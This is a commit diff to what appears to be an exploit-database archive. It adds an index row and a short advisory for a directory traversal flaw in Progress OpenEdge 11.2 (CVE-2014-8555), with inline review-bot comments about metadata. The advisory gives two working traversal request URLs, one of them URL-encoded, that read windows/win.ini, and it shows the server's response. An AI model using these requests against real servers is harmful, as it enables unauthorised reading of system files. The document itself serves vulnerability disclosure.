Updated 11_09_2014
parent af904ead9b
commit 173a7ded66
2 changed files with 72 additions and 0 deletions
|
@ -31644,6 +31644,7 @@ id,file,description,date,author,platform,type,port
|
|||
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090
|
||||
35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
|
||||
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
|
||||
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
|
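Review bot: The date column of the added 35127 row (2014-10-31) does not match the "Date: 30/10/2014" line in the header of platforms/jsp/webapps/35127.txt, which this same commit adds. If the column records when the entry was published rather than the author's disclosure date, that convention should be documented; otherwise the row should read 2014-10-30. The description also leaves out the CVE id that the file carries (CVE-2014-8555), so the row cannot be found by a CVE search over the index.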
|
71
platforms/jsp/webapps/35127.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Progress OpenEdge Directory Traversal
|
||||
# Date: 30/10/2014
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.progress.com
|
||||
# Software Link: www.progress.com/products/openedge
|
||||
# Version: 11.2
|
||||
# Tested on: Windows OS
|
||||
# CVE : CVE-2014-8555
|
||||
|
||||
|
||||
|
||||
The malicious user sends a malformed request that generates the file access
|
||||
up directories as follows:
|
||||
|
||||
|
||||
|
||||
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
|
||||
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
|
||||
|
||||
|
||||
|
||||
or else
|
||||
|
||||
|
||||
|
||||
http://
|
||||
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
|
||||
/../../windows/win.ini
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
And the application answers
|
||||
|
||||
|
||||
|
||||
; for 16-bit app support
|
||||
|
||||
[fonts]
|
||||
|
||||
[extensions]
|
||||
|
||||
[mci extensions]
|
||||
|
||||
[files]
|
||||
|
||||
[Mail]
|
||||
|
||||
MAPI=1
|
||||
|
||||
CMCDLLNAME32=mapi32.dll
|
||||
|
||||
CMC=1
|
||||
|
||||
MAPIX=1
|
||||
|
||||
MAPIXVER=1.0.0.1
|
||||
|
||||
OLEMessaging=1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
|
||||
|
||||
|
||||
|
||||
Thanks
|
||||
|
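Review bot: The new file is recorded as "Executable file", but 35127.txt is a plain-text advisory with nothing in it to run, so it should be added with a non-executable mode (100644). The header gives only "Version: 11.2" and "Tested on: Windows OS", with no fixed release or vendor advisory reference, and the single external link is described as Portuguese-only; someone triaging CVE-2014-8555 has no remediation or affected-range information to act on from this file, so a line stating the fix status (or that none was known at the time) would help.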